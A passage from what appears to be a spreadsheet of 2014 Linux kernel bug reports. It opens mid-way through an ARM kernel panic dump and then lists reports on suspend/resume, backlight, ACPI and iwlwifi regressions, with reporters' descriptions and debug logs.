21.084191] 3e5c c042bd28 00000020 ea8e10b8 c0b1a3f0 c0107644 ebb52000 00000000 ebb53ea4 [ 21.084800] 3e7c ebb53e88 ea8e10b8 ea8e1158 ea8e10b8 c0b1a3f0 c0107644 00000000 ebb53ecc [ 21.085374] 3e9c ebb53ea8 c02fd064 c0269f60 00000000 ea8e10b8 ea8e10b8 ea8e1158 c0b1a3f0 [ 21.086062] 3ebc c0b1a3f0 ebb53eec ebb53ed0 c027ed0c c02fcf80 00000000 ea8e10b8 ea8e1104 [ 21.086674] [ 21.086676] R6: 0xebb51f80: [ 21.086869] 1f80 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.087329] 1fa0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.087833] 1fc0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.088300] 1fe0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.088789] 2000 00000002 00000003 00000000 e8fff300 c10661c0 00000001 00000015 eb79ac40 [ 21.089253] 2020 eb79ac40 c103c0d8 ebb52000 e8fff300 eb78ad00 c2406600 ebb53d3c ebb53c90 [ 21.089758] 2040 c0a498c8 00000000 00000000 00000000 00000000 00000000 01010000 00000000 [ 21.090271] 2060 7e213dd0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.090725] [ 21.090726] R7: 0xec0d5168: [ 21.090858] 5168 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.091363] 5188 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.091830] 51a8 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.092334] 51c8 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.092838] 51e8 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.093308] 5208 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.093817] 5228 00000000 00000000 ec0d5230 ec0d5230 62636d6d 70306b6c 00003732 00000000 [ 21.094337] 5248 00000000 00000000 00000000 00000000 bcf4f857 5f65f4ab 6f9467bf 5bf2f9c0 [ 21.094845] [ 21.094846] R8: 0xc103c058: [ 21.094945] c058 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.095446] c078 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.095913] c098 00000064 00008000 0000000f c241a040 00000004 00000008 c2412000 c241a000 [ 21.096424] c0b8 00000001 0000002c c2402000 c240a000 00001000 00000000 00000003 c23fb000 [ 21.096936] c0d8 013cd000 013d5000 013dd000 013e5000 00046b00 00000002 00036be5 0007ffff [ 21.097438] c0f8 00000001 00000032 0000fffa 00000001 ee002100 0000000f ed89b910 ed9b5d00 [ 21.097909] c118 00000011 c241e100 0001ffff ee012680 ee002480 00000064 ee012700 00000010 [ 21.098415] c138 c249e100 0000ffff 00100000 ee015000 ee002100 0000000f 00000001 c0d26e0c [ 21.098916] [ 21.098918] R9: 0xebb51f80: [ 21.099022] 1f80 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.099565] 1fa0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.100104] 1fc0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.100570] 1fe0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.101070] 2000 00000002 00000003 00000000 e8fff300 c10661c0 00000001 00000015 eb79ac40 [ 21.101677] 2020 eb79ac40 c103c0d8 ebb52000 e8fff300 eb78ad00 c2406600 ebb53d3c ebb53c90 [ 21.102257] 2040 c0a498c8 00000000 00000000 00000000 00000000 00000000 01010000 00000000 [ 21.102804] 2060 7e213dd0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 [ 21.103358] Process Thread-71 (pid: 1504, stack limit = 0xebb522f0) [ 21.103493] Stack: (0xebb53e38 to 0xebb54000) [ 21.103599] 3e20: ec0d5000 00000003 [ 21.103695] 3e40: 00000001 ebb52000 c01b4c34 00000000 ebb53ea4 ebb53e60 c0269fb4 c042bd28 [ 21.103750] 3e60: 00000020 ea8e10b8 c0b1a3f0 c0107644 ebb52000 00000000 ebb53ea4 ebb53e88 [ 21.103850] 3e80: ea8e10b8 ea8e1158 ea8e10b8 c0b1a3f0 c0107644 00000000 ebb53ecc ebb53ea8 [ 21.103949] 3ea0: c02fd064 c0269f60 00000000 ea8e10b8 ea8e10b8 ea8e1158 c0b1a3f0 c0b1a3f0 [ 21.104041] 3ec0: ebb53eec ebb53ed0 c027ed0c c02fcf80 00000000 ea8e10b8 ea8e1104 ec0d5000 [ 21.104093] 3ee0: ebb53f0c ebb53ef0 c027f8f8 c027ec7c 00000000 ea88cf68 ea8e10b8 0000000a [ 21.104225] 3f00: ebb53f94 ebb53f10 c0274c84 c027f820 ebe6d3d0 ebd2a000 ebe6d3d0 ec4c7f68 [ 21.104361] 3f20: 0026c8ca 00000003 ebd2a010 00000000 edc04088 ec535308 00000000 00000002 [ 21.104414] 3f40: 00000000 00000000 0b30001b c0108180 00000001 000003e8 000003e8 00000000 [ 21.104510] 3f60: 000044e1 00000000 006447ef 1017df7f 53da94a7 0ca47722 53da94a7 7747ab60 [ 21.104600] 3f80: 77496de0 00000000 ebb53fa4 ebb53f98 c0274d24 c0274b74 00000000 ebb53fa8 [ 21.104690] 3fa0: c0107400 c0274d10 7747ab60 77496de0 7747ab60 00008000 77496de0 00008180 [ 21.104741] 3fc0: 7747ab60 77496de0 00000000 0000000a 7e213b10 7a168ed8 77496df0 7e213b24 [ 21.104928] 3fe0: 7a168ee0 7e213a80 4013d1d1 40148a30 20070010 7747ab60 00000000 00000000 [ 21.105032] [&lt;c042bd68&gt;] (__percpu_counter_add+0x4c/0xd8) from [&lt;c0269fb4&gt;] (__sb_start_write+0x60/0x104) [ 21.105126] [&lt;c0269fb4&gt;] (__sb_start_write+0x60/0x104) from [&lt;c02fd064&gt;] (ext4_evict_inode+0xf0/0x4a0) [ 21.105186] [&lt;c02fd064&gt;] (ext4_evict_inode+0xf0/0x4a0) from [&lt;c027ed0c&gt;] (evict+0x9c/0x184) [ 21.105280] [&lt;c027ed0c&gt;] (evict+0x9c/0x184) from [&lt;c027f8f8&gt;] (iput+0xe4/0x1ec) [ 21.105371] [&lt;c027f8f8&gt;] (iput+0xe4/0x1ec) from [&lt;c0274c84&gt;] (do_unlinkat+0x11c/0x160) [ 21.105557] [&lt;c0274c84&gt;] (do_unlinkat+0x11c/0x160) from [&lt;c0274d24&gt;] (sys_unlink+0x20/0x24) [ 21.105612] [&lt;c0274d24&gt;] (sys_unlink+0x20/0x24) from [&lt;c0107400&gt;] (ret_fast_syscall+0x0/0x30) [ 21.105708] Code: e1a0200c e5960014 e5971018 e7980100 (e791a000) [ 21.105867] ---[ end trace b2d354afff160c81 ]--- [ 21.105920] Kernel panic - not syncing: Fatal exception [ 21.105979] CPU3: stopping [ 21.106079] [&lt;c010e498&gt;] (unwind_backtrace+0x0/0x144) from [&lt;c0a398e8&gt;] (dump_stack+0x20/0x24) [ 21.106136] [&lt;c0a398e8&gt;] (dump_stack+0x20/0x24) from [&lt;c010c9b0&gt;] (handle_IPI+0x198/0x1cc) [ 21.106317] [&lt;c010c9b0&gt;] (handle_IPI+0x198/0x1cc) from [&lt;c01005a0&gt;] (gic_handle_irq+0xb0/0xf4) [ 21.106421] [&lt;c01005a0&gt;] (gic_handle_irq+0xb0/0xf4) from [&lt;c0107000&gt;] (__irq_svc+0x40/0x70) [ 21.106514] Exception stack(0xebe97e98 to 0xebe97ee0) [ 21.106583] 7e80: eaf50b80 07b00000 [ 21.106685] 7ea0: 00000000 c1a2eae0 c0ba6414 ea23c414 eaf5da40 eaf5da58 ebe97f78 eaf50b80 [ 21.106781] 7ec0: 00001000 ebe97ef4 ebe97ef8 ebe97ee0 c02c5120 c02c5d80 600f0013 ffffffff [ 21.106841] [&lt;c0107000&gt;] (__irq_svc+0x40/0x70) from [&lt;c02c5d80&gt;] (sysfs_get_active+0x28/0x74) [ 21.106968] [&lt;c02c5d80&gt;] (sysfs_get_active+0x28/0x74) from [&lt;c02c5120&gt;] (sysfs_read_file+0x78/0x180) [ 21.107083] [&lt;c02c5120&gt;] (sysfs_read_file+0x78/0x180) from [&lt;c0266350&gt;] (vfs_read+0xac/0x150) [ 21.107180] [&lt;c0266350&gt;] (vfs_read+0xac/0x150) from [&lt;c0266684&gt;] (sys_read+0x48/0x80) [ 21.107236] [&lt;c0266684&gt;] (sys_read+0x48/0x80) from [&lt;c0107400&gt;] (ret_fast_syscall+0x0/0x30) [ 21.107365] CPU2: stopping [ 21.107433] [&lt;c010e498&gt;] (unwind_backtrace+0x0/0x144) from [&lt;c0a398e8&gt;] (dump_stack+0x20/0x24) [ 21.107535] [&lt;c0a398e8&gt;] (dump_stack+0x20/0x24) from [&lt;c010c9b0&gt;] (handle_IPI+0x198/0x1cc) [ 21.107634] [&lt;c010c9b0&gt;] (handle_IPI+0x198/0x1cc) from [&lt;c01005a0&gt;] (gic_handle_irq+0xb0/0xf4) [ 21.107791] [&lt;c01005a0&gt;] (gic_handle_irq+0xb0/0xf4) from [&lt;c01071c0&gt;] (__irq_usr+0x40/0x60) [ 21.107844] Exception stack(0xeb0abfb0 to 0xeb0abff8) [ 21.107944] bfa0: b7248210 b72508c0 00001000 00000001 [ 21.108040] bfc0: b7250618 b4dc4d64 00001000 b7248210 b72508c0 b4cc7000 bedce5dc b6ed62ec [ 21.108095] bfe0: 00000004 b4dc4cf8 b6970499 b689a6d6 20000030 ffffffff [ 21.108245] CPU0: stopping [ 21.108307] [&lt;c010e498&gt;] (unwind_backtrace+0x0/0x144) from [&lt;c0a398e8&gt;] (dump_stack+0x20/0x24) [ 21.108416] [&lt;c0a398e8&gt;] (dump_stack+0x20/0x24) from [&lt;c010c9b0&gt;] (handle_IPI+0x198/0x1cc) [ 21.108514] [&lt;c010c9b0&gt;] (handle_IPI+0x198/0x1cc) from [&lt;c01005a0&gt;] (gic_handle_irq+0xb0/0xf4) [ 21.108570] [&lt;c01005a0&gt;] (gic_handle_irq+0xb0/0xf4) from [&lt;c0107000&gt;] (__irq_svc+0x40/0x70) [ 21.108663] Exception stack(0xea2cbf00 to 0xea2cbf48) [ 21.108760] bf00: 00000000 7696e000 ffff0001 eacf5500 ebe8d500 7696e000 00000007 7696f000 [ 21.108816] bf20: ea2ca000 00000007 00000007 ea2cbf5c ea2cbf60 ea2cbf48 c02563c8 c0253ef8 [ 21.108914] bf40: 600e0013 ffffffff [ 21.108976] [&lt;c0107000&gt;] (__irq_svc+0x40/0x70) from [&lt;c0253ef8&gt;] (find_vma+0x24/0xc0) [ 21.109079] [&lt;c0253ef8&gt;] (find_vma+0x24/0xc0) from [&lt;c02563c8&gt;] (sys_mprotect+0xc4/0x1f4) [ 21.109180] [&lt;c02563c8&gt;] (sys_mprotect+0xc4/0x1f4) from [&lt;c0107400&gt;] (ret_fast_syscall+0x0/0x30) [ 22.109582] Rebooting in 5 seconds.. [ 27.111231] Going down for restart now [ 27.111989] Calling SCM to disable SPMI PMIC arbiter No errors detected Boot info: Last boot reason: kernel_panic</t>
  </si>
  <si>
    <t>Gabriele Mazzotta</t>
  </si>
  <si>
    <t>ATAPI-CD-ROM-drive dead after resume from suspend/s2disk - Jmicron ctrlr vs async suspend</t>
  </si>
  <si>
    <t>2014-08-02 13:18 UTC</t>
  </si>
  <si>
    <t>Jay</t>
  </si>
  <si>
    <t>2015-09-01 02:52 UTC</t>
  </si>
  <si>
    <t>Good day! After resume from suspend (I use "save to both") my PC's ATAPI-CD-ROM-drive doesn't respond any more. I get this message "syslogd: "kernel:[2784.783099] Disabling IRQ #17". This is the IRQ that the modularized adapter-driver (JMicron) uses. This happens with an unmodified distribution kernel (openSuse "stable", 3.15.7) and with all self-built kernels since 3.15.(0). This issue does not exist with 3.14 and earlier (same hardware/same kernel-configuration). Kind regards Jay</t>
  </si>
  <si>
    <t>openSuSE kernel-desktop-3.15.8-2.1.g258e3b0.x86_64 causes horrible backlight flicker - Radeon 1250</t>
  </si>
  <si>
    <t>3.15.8</t>
  </si>
  <si>
    <t>2014-08-08 21:58 UTC</t>
  </si>
  <si>
    <t>David C. Rankin</t>
  </si>
  <si>
    <t>2015-03-31 08:48 UTC</t>
  </si>
  <si>
    <t>Yesterday, updating openSuSE 13.1 from http://download.opensuse.org/repositories/Kernel:/stable/standard/ , I pulled in the updated kernel: kernel-desktop-3.15.8-2.1.g258e3b0.x86_64 This was an update from: kernel-desktop-3.15.6-2.1.gedc5ddf.x86_64 Every 1-2 seconds the backlight flickers horribly. It makes the laptop unusable. (related to bug report of ACPI backlight keyboard keys not controlling backlight: https://bugzilla.novell.com/show_bug.cgi?id=887629 ?). The flicker starts as soon as the kernel is booted, is present during the splash screen and remain unchanged after the display and window managers load -- so it is kernel/module related and not desktop related... Booting back into kernel-desktop-3.15.6-2.1.gedc5ddf.x86_64 and all is fine. This is on a Toshiba p205d [AMD/ATI] RS690M [Radeon Xpress 1200/1250/1270]. I have never seen backlight flicker before on this laptop and dropping back to 3.15.6 all is fine. Discussion with one of the openSuSE kernel maintainers suggested commit be907c8468c9f47882036109ba550cd2748b86a0 (drm/radeon: set default bl level to something reasonable) may be part of the problem. Let me know what all additional information you need and I'll be glad to get it for you.</t>
  </si>
  <si>
    <t>No longer able to build iwldvm into the kernel</t>
  </si>
  <si>
    <t>3.17-rc0</t>
  </si>
  <si>
    <t>2014-08-10 10:02 UTC</t>
  </si>
  <si>
    <t>2014-09-07 06:28 UTC</t>
  </si>
  <si>
    <t>Ever since ae7486a2b734ee039bec94427c25317c589f1664 I've been unable to build iwldvm into the kernel it's only ever build as a module now (removing the dependency on m in the Kconfig fixes the issue from me</t>
  </si>
  <si>
    <t>(Xeon(R) CPU E5-2697 v2 )reboot(fixed)after resume, and deadlock on dma_lock when suspend(root caused)</t>
  </si>
  <si>
    <t>2014-08-13 09:40 UTC</t>
  </si>
  <si>
    <t>Janek Kozicki</t>
  </si>
  <si>
    <t>2016-08-24 07:46 UTC</t>
  </si>
  <si>
    <t>Created attachment 146411 [details] 1. magic numbers 2. dmesg 3.lspci I did full testing using instructions in both files Rafael suggested: Documentation/power/s2ram.txt Documentation/power/basic-pm-debugging.txt So I used CONFIG_PM_TRACE_RTC=y. I did about a dozen of hibernate/resume attempts, always with: /bin/sync echo 1 &gt; /sys/power/pm_trace echo reboot &gt; /sys/power/disk echo disk &gt; /sys/power/state then after a failed resume I recorded magic number(s) from realtime clock - see attachment. The info from `cat /sys/power/pm_trace_dev_match` varied between: pci acpi acpi and just this: pci_bus In case if you need some other info, a full dmesg from one of reboots after a failed resume is in the attachment. Now I tried to identify the problem. There are two magic numbers recorded in realtime clock: pci 0000:ff:0d.1: hash matches pci_bus 0000:ff: hash matches The 0000:ff: is strange, like no particular piece of hardware driver is wrong, but whole bus? The 0000:ff:0d.1 from lspci is a following thing: ff:0d.1 System peripheral [0880]: Intel Corporation Ivytown Unicast Registers [8086:0ee3] (rev 04) Subsystem: Super Micro Computer Inc Device [15d9:0628] Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Also in the attachment is my full lspci output. So that's the best I could do so far. Currently I am waiting for more instructions from you on how to proceed. please help. If there's anything I could do for debugging, please let me know. PS: I am pretty sure that my hardware is not broken. PSS: this bug is also reported on http://lkml.iu.edu//hypermail/linux/kernel/1408.1/00372.html best regards Janek Kozicki</t>
  </si>
  <si>
    <t>Almost all ACPI notifications delayed by more than 1sec</t>
  </si>
  <si>
    <t>2014-08-17 15:12 UTC</t>
  </si>
  <si>
    <t>2014-10-28 00:23 UTC</t>
  </si>
  <si>
    <t>Almost all notifications (ac state change, battery state change, brightness) happen after long delay (1 sec or more). First commit is: c0d653412fc8450370167a3268b78fc772ff9c87 ACPI / EC: Fix race condition in ec_transaction_completed() https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=c0d653412fc8450370167a3268b78fc772ff9c87</t>
  </si>
  <si>
    <t>Intel Turbo can't be disabled/enabled under certain conditions</t>
  </si>
  <si>
    <t>2014-08-24 19:26 UTC</t>
  </si>
  <si>
    <t>2015-07-28 14:00 UTC</t>
  </si>
  <si>
    <t>On my laptop (Dell XPS 13 9333) MSR_IA32_MISC_ENABLE_TURBO_DISABLE is 0 when AC is present, 1 otherwise. Because of this, setting turbo_disabled on init leads to some issues: * If I turn on the laptop while the AC is present, the sysfs interface always allows me to change the state of no_turbo. However, the changes are only effective when the AC is present. * If I turn on the laptop while on battery, the sysfs interface doesn't allow me to change the state of no_turbo. That means I'm not able to disable it when it's automatically enabled when I plug the AC. Note that I don't have the possibility to disable Intel Turbo from the BIOS settings.</t>
  </si>
  <si>
    <t>Iwlwifi: wifi-link 3160-AC firmware clashes with CONFIG_IWLWIFI_BCAST_FILTERING</t>
  </si>
  <si>
    <t>3.17-rc1</t>
  </si>
  <si>
    <t>2014-08-25 21:28 UTC</t>
  </si>
  <si>
    <t>Christian Lamparter</t>
  </si>
  <si>
    <t>2014-09-16 16:41 UTC</t>
  </si>
  <si>
    <t>I have a Intel® Dual Band Wireless-AC 3160. When I try to connect to one (in fact any) of my networks, I'm getting the following errors: [ 1021.092378] iwlwifi 0000:01:00.0: Microcode SW error detected. Restarting 0x82000000. [...] [ 1021.093935] iwlwifi 0000:01:00.0: Start IWL Error Log Dump: [ 1021.093939] iwlwifi 0000:01:00.0: Status: 0x00000000, count: 6 [ 1021.093942] iwlwifi 0000:01:00.0: Loaded firmware version: 25.223.9.0 [ 1021.093947] iwlwifi 0000:01:00.0: 0x00000038 | BAD_COMMAND &lt;--- [ 1021.093951] iwlwifi 0000:01:00.0: 0x00A00220 | uPc [...] [ 1021.094192] Call Trace: [ 1021.094205] [&lt;ffffffff813ce9bd&gt;] ? dump_stack+0x41/0x51 [ 1021.094217] [&lt;ffffffffa0b9cd8b&gt;] ? iwl_trans_pcie_send_hcmd+0x367/0x438 [iwlwifi] [ 1021.094226] [&lt;ffffffffa0b9b52c&gt;] ? iwl_pcie_enqueue_hcmd+0x5e3/0x5fe [iwlwifi] [ 1021.094235] [&lt;ffffffff8105fd4c&gt;] ? finish_wait+0x5d/0x5d [ 1021.094250] [&lt;ffffffffa0d50106&gt;] ? iwl_mvm_send_cmd+0xd/0x22 [iwlmvm] [ 1021.094262] [&lt;ffffffffa0d50160&gt;] ? iwl_mvm_send_cmd_pdu+0x45/0x52 [iwlmvm] [ 1021.094273] [&lt;ffffffffa0d4c5fb&gt;] ? iwl_mvm_configure_bcast_filter.isra.14.part.15+0x36/0x3f [iwlmvm] (Full log attached) What cough my eye was the "BAD_COMMAND" in the error log. I disabled "CONFIG_IWLWIFI_BCAST_FILTERING" option and the 3160 is now working. As far as I can tell, there is already a firmware feature flag: "IWL_UCODE_TLV_FLAGS_BCAST_FILTERING" which can be used to distinguish whenever the feature is supported or not. But it seems to be "stuck on" for the 3160. BTW: I also tried the older "23.214.9.0" and "25.222.9.0" firmwares as well. =&gt; Same result [Doesn't work with BCAST_FILTERING enabled].</t>
  </si>
  <si>
    <t>intel n2230 turns slow without power</t>
  </si>
  <si>
    <t>2014-09-07 12:22 UTC</t>
  </si>
  <si>
    <t>GRbit</t>
  </si>
  <si>
    <t>2014-09-09 09:51 UTC</t>
  </si>
  <si>
    <t>There re a lot of complains on n2230 in the internet. All advices are lead to switch of 11n functionality, which sometimes helps, but sometimes doesn't. So here is my problem with this card: If I test my wifi speed with power cable plugged in my notebook, the speed is ok. But if I for a second pull out the cable, sped drops instantly after that. PCI powersafe in BIOS switched off Trying to switch off iwlwifi module power_save, doesn't help Notebook: Lenovo thinkpad edge e330 Machine Type Model 33542E8 Wifi card: Intel Centrino N2230 ilw@linux.intel.com iwl@linux.intel.com</t>
  </si>
  <si>
    <t>HP Pavilion dv6-3182 shows at least one additional backlight interface</t>
  </si>
  <si>
    <t>3.13.0</t>
  </si>
  <si>
    <t>2014-09-08 18:37 UTC</t>
  </si>
  <si>
    <t>ntrrgc@gmail.com</t>
  </si>
  <si>
    <t>2014-12-08 01:44 UTC</t>
  </si>
  <si>
    <t>My HP Pavilion dv6-3182 laptop shows three interfaces in /sys/class/backlight: acpi_video0, acpi_video1 and radeon_bl0. radeon_bl0 only appears when the radeon driver is used (i.e. not if fglrx is used). Both acpi_video0 and radeon_bl0 control the brightness of the screen, but acpi_video0 has 11 brightness levels whilst radeon_bl0 has 256. As far as I know, acpi_video1 has no purpose. Writing to its brightness file doesn't do anything, but it causes problems to desktop environments that choose it over the other options.</t>
  </si>
  <si>
    <t>Thinkpad extra buttons (thinkpad_acpi) no longer functioning with 3.17.0rc4</t>
  </si>
  <si>
    <t>3.17.0rc4</t>
  </si>
  <si>
    <t>2014-09-12 10:03 UTC</t>
  </si>
  <si>
    <t>Thomas Richter</t>
  </si>
  <si>
    <t>2015-07-22 00:46 UTC</t>
  </si>
  <si>
    <t>Starting with at least kernel 3.17.0rc4, the thinkpad extra buttons on an IBM R31 are no longer functioning and remain unresponsive. On the boot-log, I receive the message ACPI: SCI (ACPI GSI 9) not registered The same configuration (same user space) worked flawless on a vanilla 3.15.0.</t>
  </si>
  <si>
    <t>[ivb] Intel backlight does not adjust, but only turns on/off in kernel 3.16 on Samsung 880Z5E laptop</t>
  </si>
  <si>
    <t>3.16.2</t>
  </si>
  <si>
    <t>2014-09-14 10:39 UTC</t>
  </si>
  <si>
    <t>Vitaliy Filippov</t>
  </si>
  <si>
    <t>2015-05-17 20:30 UTC</t>
  </si>
  <si>
    <t>Hi! After upgrading from kernel 3.14 to 3.16 on a Samsung 880Z5E laptop (with dual Intel HD 4000 and Radeon 8770M cards), the intermediate % of backlight don't work. I.e. /sys/class/backlight/intel_backlight is there with max_brightness=4882 and type=raw, but all brightness levels &gt; 0 result in full brightness, and brightness level = 0 results in the screen turned off. The same is on the brightness adjustment UI: 0% is "turned off", everything greater than 0% is full brightness. (although when the screen is turned on after being turned off, the backlight turns on smoothly) acpi_backlight=vendor and video.use_native_backlight=1 also don't work. What other details do you need? acpidump, dmidecode?</t>
  </si>
  <si>
    <t>Asus X53SM: Brightness control does not work anymore [regression]</t>
  </si>
  <si>
    <t>3.16.3</t>
  </si>
  <si>
    <t>2014-09-23 14:32 UTC</t>
  </si>
  <si>
    <t>2015-01-06 07:34 UTC</t>
  </si>
  <si>
    <t>With Linux 3.16.3, controlling the brightness of my laptop screen does not work anymore. It's working fine with the 3.15.10 kernel (both vanilla). Previous behavior (3.15): * When I drag the brightness slider in KDE, the OSD appears and the brightness changes. * After some minutes of inactivity with no AC (as configured in the KDE power-saving options), the screen is dimmed. * When I press the brightness keys on the keyboard, the brightness changes *but* KDE does not notice, no OSD appears, and the brightness slider in the battery applet does not move. Current behavior (3.16): * Dragging the brightness slider does nothing except for showing the OSD. * No dimming on inactivity happens. * Pressing the brightness ekys on the keyboard results in the KDE brightness OSD appearing, without the brightness changing. So the power system (KDE, presumably through upower?) now notices that I press the power keys. However, the keys don't work anymore. Overall, this is clearly a regression as I can now no longer control the brightness. I bootet the current system with the old kernel to verify that the kernel is the only part that changed. I can do a bisect, but I'd appreciate a pointer which directory to restrict the bisect to. I reported this bug against Debian as well at &lt;https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762285&gt;. That report contains a whole lot of information about by hardware. Please let me know if you need further information.</t>
  </si>
  <si>
    <t>iwlmvm: Problem with p2p_find</t>
  </si>
  <si>
    <t>3.17.0-rc5</t>
  </si>
  <si>
    <t>2014-09-25 06:46 UTC</t>
  </si>
  <si>
    <t>Marek Puzyniak</t>
  </si>
  <si>
    <t>2014-10-06 18:31 UTC</t>
  </si>
  <si>
    <t>Created attachment 151871 [details] Kernel oops photo ilw@linux.intel.com p2p_find causes warnings: ~~~~~ [ 382.620297] WARNING: CPU: 0 PID: 5391 at drivers/net/wireless/iwlwifi/mvm/utils.c:93 iwl_mvm_send_cmd+0x131/0x1b0 [iwlmvm]() [ 382.620298] Modules linked in: ppdev lp rfcomm bnep binfmt_misc nfsd auth_rpcgss nfs_acl nfs lockd fscache sunrpc uvcvideo arc4 iwlmvm videobuf2_vmalloc videobuf2_memops videobuf2_core v4l2_common videodev iwldvm joydev btusb mac80211 bluetooth i915 iwlwifi snd_hda_codec_hdmi snd_hda_codec_idt snd_hda_codec_generic tpm_tis snd_hda_intel snd_hda_controller snd_hda_codec cfg80211 snd_hwdep snd_pcm drm_kms_helper snd_seq snd_seq_device drm snd_timer psmouse snd iTCO_wdt dell_laptop dcdbas video soundcore dell_wmi i2c_algo_bit parport_pc iTCO_vendor_support parport serio_raw evbug sparse_keymap pcspkr i2c_i801 lpc_ich wmi mac_hid e1000e sdhci_pci ptp pps_core sdhci ahci libahci [ 382.620332] CPU: 0 PID: 5391 Comm: wpa_supplicant Tainted: G W 3.17.0-rc5 #59 [ 382.620333] Hardware name: Dell Inc. Latitude E6420/0K0DNP, BIOS A08 10/18/2011 [ 382.620333] 0000000000000009 ffff880211b7f6e8 ffffffff8174325d 0000000000000000 [ 382.620336] 0000000000000000 ffff880211b7f728 ffffffff810547cc ffff880211b7f728 [ 382.620338] ffff88021f96e628 ffff880211b7f790 ffff88021f96eea0 ffff88021f89db08 [ 382.620341] Call Trace: [ 382.620343] [&lt;ffffffff8174325d&gt;] dump_stack+0x46/0x58 [ 382.620346] [&lt;ffffffff810547cc&gt;] warn_slowpath_common+0x8c/0xc0 [ 382.620348] [&lt;ffffffff8105481a&gt;] warn_slowpath_null+0x1a/0x20 [ 382.620352] [&lt;ffffffffa05b4d11&gt;] iwl_mvm_send_cmd+0x131/0x1b0 [iwlmvm] [ 382.620354] [&lt;ffffffff810a1d4d&gt;] ? trace_hardirqs_on+0xd/0x10 [ 382.620356] [&lt;ffffffff810587ba&gt;] ? __local_bh_enable_ip+0x6a/0xc0 [ 382.620360] [&lt;ffffffffa05b4dcc&gt;] iwl_mvm_send_cmd_pdu+0x3c/0x50 [iwlmvm] [ 382.620363] [&lt;ffffffffa05addfc&gt;] iwl_mvm_send_aux_roc_cmd.isra.7+0x15c/0x230 [iwlmvm] [ 382.620366] [&lt;ffffffffa05ad9c0&gt;] ? iwl_mvm_switch_vif_chanctx+0x1a0/0x1a0 [iwlmvm] [ 382.620369] [&lt;ffffffffa05adf65&gt;] iwl_mvm_roc+0x95/0x2d0 [iwlmvm] [ 382.620372] [&lt;ffffffff810c0f44&gt;] ? init_timer_key+0x94/0xe0 [ 382.620380] [&lt;ffffffffa0512b18&gt;] ieee80211_start_roc_work+0x248/0x620 [mac80211] [ 382.620383] [&lt;ffffffff8162393c&gt;] ? __kmalloc_reserve.isra.51+0x3c/0xa0 [ 382.620390] [&lt;ffffffffa05134c7&gt;] ieee80211_remain_on_channel+0x67/0x90 [mac80211] [ 382.620398] [&lt;ffffffffa01e2218&gt;] nl80211_remain_on_channel+0x1a8/0x2a0 [cfg80211] [ 382.620401] [&lt;ffffffff816655d5&gt;] genl_family_rcv_msg+0x1a5/0x3c0 [ 382.620402] [&lt;ffffffff81665427&gt;] ? genl_lock+0x17/0x20 [ 382.620405] [&lt;ffffffff816657f0&gt;] ? genl_family_rcv_msg+0x3c0/0x3c0 [ 382.620406] [&lt;ffffffff81665879&gt;] genl_rcv_msg+0x89/0xc0 [ 382.620408] [&lt;ffffffff81664fc1&gt;] netlink_rcv_skb+0xb1/0xc0 [ 382.620410] [&lt;ffffffff816651dd&gt;] ? genl_rcv+0x1d/0x40 [ 382.620412] [&lt;ffffffff816651ec&gt;] genl_rcv+0x2c/0x40 [ 382.620413] [&lt;ffffffff8166487d&gt;] netlink_unicast+0x18d/0x200 [ 382.620415] [&lt;ffffffff81664c0d&gt;] netlink_sendmsg+0x31d/0x430 [ 382.620417] [&lt;ffffffff8161ab0c&gt;] sock_sendmsg+0x9c/0xd0 [ 382.620419] [&lt;ffffffff81176a9c&gt;] ? might_fault+0x8c/0xa0 [ 382.620422] [&lt;ffffffff81176a53&gt;] ? might_fault+0x43/0xa0 [ 382.620423] [&lt;ffffffff81629336&gt;] ? verify_iovec+0x56/0xe0 [ 382.620425] [&lt;ffffffff8161b5c9&gt;] ___sys_sendmsg+0x389/0x3a0 [ 382.620428] [&lt;ffffffff811ff640&gt;] ? fsnotify+0x80/0x320 [ 382.620430] [&lt;ffffffff811d1a6d&gt;] ? SyS_fcntl+0x55d/0x640 [ 382.620432] [&lt;ffffffff8161c039&gt;] __sys_sendmsg+0x49/0x90 [ 382.620434] [&lt;ffffffff8161c092&gt;] SyS_sendmsg+0x12/0x20 [ 382.620436] [&lt;ffffffff8174c456&gt;] system_call_fastpath+0x1a/0x1f [ 382.620437] ---[ end trace 497ae1d58c141e2a ]--- ~~~~~ and then after some time &gt; ifconfig wlan5 down causes kernel oops (attached as photo) Environment: -debian on x86_64 machine -kernel 3.17.0-rc5 -latest wpa_supplicant (with P2P support) -info from dmesg: ~~ Sep 24 16:06:03 dell-lap kernel: [ 12.680081] iwlwifi 0000:01:00.0: loaded firmware version 23.214.9.0 op_mode iwlmvm ~ Sep 24 16:06:03 dell-lap kernel: [ 13.070506] iwlwifi 0000:01:00.0: Detected Intel(R) Dual Band Wireless AC 7260, REV=0x144 ~~</t>
  </si>
  <si>
    <t>iwlwifi iwlmvm WARN: Got an HT rate for a non data frame 0x8 (drivers/net/wireless/iwlwifi/mvm/tx.c:190 iwl_mvm_set_tx_params)</t>
  </si>
  <si>
    <t>2014-10-06 17:12 UTC</t>
